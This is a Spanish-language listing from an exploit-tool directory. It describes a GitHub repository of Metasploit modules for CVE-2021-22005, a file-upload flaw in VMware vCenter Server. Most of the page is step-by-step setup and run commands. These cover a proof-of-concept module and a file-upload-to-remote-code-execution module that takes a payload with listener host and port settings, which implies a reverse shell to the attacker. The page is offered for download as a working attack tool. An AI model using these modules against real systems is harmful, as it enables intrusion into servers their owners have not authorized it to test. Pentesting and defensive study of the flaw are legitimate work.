Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-22005-metasploit — el script de metasploit (POC/EXP) sobre CVE-2021-22005 VMware vCenter Server contiene una vulnerabilidad de carga de archivos arbitraria | Kitploit
Herramientas/GitHubGitHub/taroballzchen/cve-2021-22005-metasploit
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubtaroballzchen/cve-2021-22005-metasploit

CVE-2021-22005-metasploit

el script de metasploit (POC/EXP) sobre CVE-2021-22005 VMware vCenter Server contiene una vulnerabilidad de carga de archivos arbitraria

Ver Repositorio
2277hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-22005-metasploit

el script de metasploit (POC/EXP) sobre CVE-2021-22005 VMware vCenter Server contiene una vulnerabilidad de carga arbitraria de archivos

preparación POC

git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
msfconsole

uso de POC

set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: true for https>
exploit

resultado

el script subirá un archivo jsp inofensivo que incluye el texto "Could be vuln by CVE-2021-22005" codificado en base64 poc

preparación EXP

git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/exploits/linux/http
cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/exploits/linux/http/
chmod +x ~/.msf4/modules/exploits/linux/http/vmware_vcenter_server_file_upload_to_rce.py
msfconsole

uso del exploit

set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
exploit

exploit

exploit

referencia

  • https://github.com/5gstudent/CVE-2021-22005-
  • https://github.com/rwincey/CVE-2021-22005
Descargar herramienta